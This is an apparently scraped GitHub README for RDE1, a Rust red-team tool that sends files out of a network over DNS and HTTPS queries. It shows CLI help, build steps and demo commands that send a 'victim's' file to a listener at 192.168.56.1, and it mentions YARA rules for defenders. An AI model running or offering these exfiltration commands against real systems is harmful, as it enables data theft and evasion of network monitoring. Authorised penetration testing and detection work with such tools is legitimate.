RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust. 🦀

Overview

:shipit: Information: RDE1 is an old personal project (end 2022) that I didn't continue development on. It's part of a list of projects that helped me to learn Rust. The code is probably considered obsolete and not in its best form. Maybe I'll pick up where I left off #roadmap. However, RDE1 is fully functional and allow to exfiltrate files from DNS and HTTPS queries.

RDE1 (Rusty Data Exfiltrator)

GitHub Windows supported Linux supported macOS supported Twitter Follow


Original logo from: here

⚠️ Disclaimer: RDE1 is for educational purposes only. Use this at your own discretion, I cannot be held responsible for any damages caused. Usage of this tool for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state and federal laws. I assume no liability and are not responsible for any misuse or damage caused by this tool.

🔴 Redteamer: I share with you a beta version of one of my tool allowing to exfiltrate files from DNS and HTTPS queries

🔵 Blueteamer: You can find an example of yara rules for CRDE binary in this same repo

🧮 Summary

🏷️ Description

SRDE (Server Rusty Data Exfiltrator)

CRDE (Client Rusty Data Exfiltrator)

RDE1 it's client and server tool allowing auditor to extract sensitives datas and files from network written in rust.

Today RDE1 can be use to extract files from DNS and HTTPS queries. All datas are encrypted with AES256. You juste need to specify the same password on the server and on the client.

📺 Usage

SRDE Usage

g0h4n@computer$ srde --help

SRDE (Server Rusty Data Exfiltrator) is a tool allowing auditor to extract files from different protocol written in rust.

Usage: srde <COMMAND>

Commands:
  dns    Exfiltrate datas from DNS server
  https  Exfiltrate datas from HTTPS server
  icmp   Exfiltrate datas from ICMP queries (not yet implemented)
  help   Print this message or the help of the given subcommand(s)

Options:
  -h, --help  Print help information
g0h4n@computer$ srde dns --help

Exfiltrate datas from DNS server

Usage: srde dns [OPTIONS] --ip <ip> --port <port> --key <key>

Options:
  -i, --ip <ip>      IP for dns server
  -p, --port <port>  Port for dns server
  -k, --key <key>    Key to decode datas
  -v...              Set the level of verbosity
  -h, --help         Print help information
g0h4n@computer$ srde https --help

Exfiltrate datas from HTTPS server

Usage: srde https [OPTIONS] --ip <ip> --port <port> --private-cert <private-cert> --public-cert <public-cert> --key <key>

Options:
  -i, --ip <ip>                      IP for https server.
  -P, --port <port>                  Port for https server.
      --private-cert <private-cert>  Private certificate for SSL (key.pem)
      --public-cert <public-cert>    Public certificate for SSL (cert.pem)
  -k, --key <key>                    key to decode datas
  -v...                              Set the level of verbosity
  -h, --help                         Print help information

CRDE Usage

g0h4n@computer$ crde --help

CRDE (Client Rusty Data Exfiltrator) is a tool allowing auditor to extract files from different protocol written in rust.

Usage: crde <COMMAND>

Commands:
  dns    Exfiltrate datas from DNS queries
  https  Exfiltrate datas from HTTPS queries
  icmp   Exfiltrate datas from ICMP queries (not yet implemented)
  help   Print this message or the help of the given subcommand(s)

Options:
  -h, --help  Print help information
g0h4n@computer$ crde dns --help

Exfiltrate datas from DNS queries

Usage: crde dns [OPTIONS] --filename <filename> --key <key>

Options:
  -f, --filename <filename>        File to exfiltrate
  -k, --key <key>                  Key to encode datas
  -d, --domain-name <domain-name>  Domain name like google.com where exfiltrate datas
  -n, --name-server <name-server>  Alternative IP address name server to use for queries
      --dns-tcp                    Use TCP instead of UDP for DNS queries
  -v...                            Set the level of verbosity
  -h, --help                       Print help information
g0h4n@computer$ crde https --help

Exfiltrate datas from HTTPS queries

Usage: crde https [OPTIONS] --filename <filename> --url <url> --key <key>

Options:
  -f, --filename <filename>  File to exfiltrate
  -u, --url <url>            URL site to extract datas like: https://www.htwmcl.fr/ or https://127.0.0.1:443/
  -k, --key <key>            key to encode datas
  -v...                      Set the level of verbosity
  -h, --help                 Print help information

📺 Demo

Demo with DNS exfiltration

Server command line example with DNS from Linux:

sudo ./srde_release dns -k P4ssW0rD12345 -i 192.168.56.1 -P 53

Client command line example with DNS from Windows:

crde_x64.exe dns -f test.txt -k P4ssW0rD12345 -d google.com -n 192.168.56.1

In this example the auditor extracts the file test.txt from the victim's computer via DNS query to the server 192.168.56.1.

Demo with HTTPS exfiltration

Server command line example with HTTPS from Linux:

sudo ./srde_release https -i 0.0.0.0 -P 443 -k PassWord --private-cert server/key.pem --public-cert server/cert.pem

Client command line example with HTTPS from Windows:

crde_x64.exe https -f test.txt -u https://192.168.56.1/ -k PassWord

In this example the auditor extracts the file test.txt from the victim's computer via HTTPS query to the server 192.168.56.1.

🚜 How to compile it?

Using Makefile

You can use the make command to compile it for Linux, Windows or mac0S.

More command in the Makefile:

SRDE server:
usage: make srde_debug
usage: make srde_release
usage: make srde_windows
usage: make srde_windows_x64
usage: make srde_windows_x86
usage: make srde_linux
usage: make srde_linux_aarch64
usage: make srde_linux_x86_64
usage: make srde_macos
usage: make srde_arm_musl
usage: make srde_armv7

CRDE client:
usage: make crde_debug
usage: make crde_release
usage: make crde_windows
usage: make crde_windows_x64
usage: make crde_windows_x86$
usage: make crde_linux
usage: make crde_linux_aarch64
usage: make crde_linux_x86_64
usage: make crde_macos
usage: make crde_arm_musl
usage: make crde_armv7

Dependencies:
usage: make install_windows_deps
usage: make install_macos_deps

Documentation:
usage: make srde_doc
usage: make crde_doc

Cleaning:
usage: make clean

Using Dockerfile

Build RED1 with docker to make sure to have all dependencies.

docker build --rm -t rde1 .

# Build SRDE server:
docker run --rm -v ./:/usr/src/rde1 rde1 srde_windows
docker run --rm -v ./:/usr/src/rde1 rde1 srde_linux
docker run --rm -v ./:/usr/src/rde1 rde1 srde_macos


# Build CRDE client:
docker run --rm -v ./:/usr/src/rde1 rde1 crde_windows
docker run --rm -v ./:/usr/src/rde1 rec2 crde_linux
docker run --rm -v ./:/usr/src/rec2 rec2 crde_macos
SHOW MORE

Using simply cargo

You need to install rust on your system (Windows/Linux/MacOS).

https://www.rust-lang.org/fr/tools/install

Here is how to compile the "release" and "debug" versions from "cargo" command.

Client binary:

git clone https://github.com/g0h4n/RDE
cd RDE
cargo b --release --manifest-path client/Cargo.toml
#or debug version
cargo b --manifest-path client/Cargo.toml

The result can be found in "client/target/release/" or in "client/target/debug/" folder.

Server binary:

git clone https://github.com/g0h4n/RDE
cd RDE
cargo b --release --manifest-path server/Cargo.toml
#or debug version
cargo b --manifest-path server/Cargo.toml

The result can be found in "server/target/release/" or in "server/target/debug/" folder.

Below you can find the compilation methodology for each of the OS from Linux. If you need another compilation system, please consult the list in this link : https://doc.rust-lang.org/nightly/rustc/platform-support.html

Manually for Windows static version from Linux

#Install rustup and cargo in Linux
curl https://sh.rustup.rs -sSf | sh

#Add Windows deps
rustup install stable-x86_64-pc-windows-gnu
rustup target add x86_64-pc-windows-gnu

#Static compilation for Windows
git clone https://github.com/g0h4n/RDE
cd RDE

#Compile static client "crde.exe"
RUSTFLAGS="-C target-feature=+crt-static" cargo build --release --target x86_64-pc-windows-gnu --manifest-path client/Cargo.toml
#Compile static server "srde.exe"
RUSTFLAGS="-C target-feature=+crt-static" cargo build --release --target x86_64-pc-windows-gnu --manifest-path server/Cargo.toml

The client crde.exe binary can be found in "client/target/x86_64-unknown-linux-gnu/release/" folder.

The server srde.exe binary can be found in "server/target/x86_64-unknown-linux-gnu/release/" folder.

🚦 Roadmap

  • Exiltration

    • DNS queries
    • HTTPS queries
    • ICMP queries
    • Add OPPSEC mode with --timer and --jitser values
  • Crypto

    • XOR (not used)
    • AES-256-CBC (default) (may be vulnerable to the "Padding Oracle" method which allows to find the blocks in clear text)
  • Versions

    • Linux
    • Windows
    • macOS (not tested)

🔗 Links

You might also like...
Library + CLI-Tool to measure the TTFB (time to first byte) of HTTP requests. Additionally, this crate measures the times of DNS lookup, TCP connect and TLS handshake.

TTFB: CLI + Lib to Measure the TTFB of HTTP/1.1 Requests Similar to the network tab in Google Chrome or Mozilla Firefox, this crate helps you find the

Flexible DNS hijacking and proxy tool.

kungfu Flexible DNS hijacking and proxy tool. Features Flexible rules e.g. glob pattern domain, static routes, response CIDR Host file include /etc/ho

Userspace libpcap-based tool to mirror your dns traffic

DNS traffic mirroring tool (dns-mirror) Description Userspace libpcap-based tool. dns-mirror sniffs dns packets on the given interface and proxies it

Dns subdomain finding tool, based off of the c application of the same name

dnsmap-rs Tool for brute-forcing/scanning for existing subdomains in a domain. Based on dnsmap c application that is packaged in kali linux. Can query

A Lightning-Fast DNS Resolver written in Rust 🦀
A Lightning-Fast DNS Resolver written in Rust 🦀

dnsresolver A Lightning-Fast DNS Resolver Table of Contents Installation Usage Basic Usage Resolving Hosts with Ports Virtual Host Enumeration Using U

Rust implementation of PRECIS Framework: Preparation, Enforcement, and Comparison of Internationalized Strings in Application Protocols

Rust PRECIS Framework libray PRECIS Framework: Preparation, Enforcement, and Comparison of Internationalized Strings in Application Protocols as descr

Drop-in proxy for Discord gateway connections and sessions allowing for zero downtime deploys

gateway-proxy This is a very hacky project, so it might stop working if Discord changes their API core. This is unlikely, but keep that in mind while

Hotwire allows you to study network traffic of a few popular protocols in a simple way
Hotwire allows you to study network traffic of a few popular protocols in a simple way

Hotwire Hotwire is a gtk GUI application that leverages the wireshark and tshark infrastructure to capture traffic and explore the contents of tcpdump

User-space Wireguard gateway allowing sharing network connection from environment where usual routing rules are inaccessible.

wgslirpy A command line tool (and a Rust library) for accepting incoming connections within a Wireguard link and routing them to external network usin

Owner
Quentin Texier (g0h4n)
Pentester and Red Team Operator 🇫🇷
Quentin Texier (g0h4n)
Obtain (wildcard) certificates from let's encrypt using dns-01 without the need for API access to your DNS provider.

Agnos Presentation Agnos is a single-binary program allowing you to easily obtain certificates (including wildcards) from Let's Encrypt using DNS-01 c

Arthur Carcano 246 Dec 20, 2022
A Rust based DNS client, server, and resolver

Trust-DNS A Rust based DNS client, server, and Resolver, built to be safe and secure from the ground up. This repo consists of multiple crates: Librar

Benjamin Fry 2.7k Dec 30, 2022
SOCKS5 implement library, with some useful utilities such as dns-query, socks5-server, dns2socks, udp-client, etc.

socks5-impl Fundamental abstractions and async read / write functions for SOCKS5 protocol and Relatively low-level asynchronized SOCKS5 server impleme

null 5 Aug 3, 2023
A primitive DNS server written in Rust for fun.

vòdo A primitive DNS server written in Rust for fun. @lucavallin ➜ /workspaces/vodo (main) $ ./target/debug/vodo -h A primitive DNS server written in

Luca Cavallin 3 Jul 27, 2023
A tcp proxy server/client which exchange the data in temp files

ftcp A tcp proxy server/client which exchange the data in temp files 通过在临时文件中交换数据来进行TCP代理的一个服务端/客户端 学校内网中有针对教学楼的防火墙导致教室电脑难以上网( 但学校内建有公共ftp服务器,因此就有了这个借

Daile Liu 2 Feb 17, 2022
Minimal DNS server built in Rust with rule system and logging.

MinDNS MinDNS is a minimal DNS server written in Rust. It is intended to be used as a firewall, black-hole or proxy DNS server. ⚡ Features Fully async

Sammwy 142 Oct 23, 2023
Third party Google DNS client for rust.

google-dns-rs Documentation Install Add the following line to your Cargo.toml file: google-dns-rs = "0.3.0" Usage use google_dns_rs::api::{Dns, DoH, R

Eduardo Stuart 2 Nov 13, 2021
Command-line DNS client using bitvec, nom and RFC 1035

Dingo Domain INformation Gatherer, Obviously. Installation Install cargo, see instructions on the Rust website Run ./install.sh (it just does cargo bu

Adam Chalmers 94 Oct 18, 2022
Resolved - a simple DNS server for home networks

resolved resolved (pronounced "resolved", not "resolved") is a simple DNS server for home networks. To that end, it supports: Recursive and non-recurs

Michael Walker 17 Sep 27, 2022
A tool to export TiDB database data to files in cases where the TiDB server can't be restored.

tidb-exporter TiDB uses RocksDB as default storage engine(in fact, TiKV uses it). tidb-exporter can export data from pure RocksDB data files even when

zz 7 Nov 1, 2023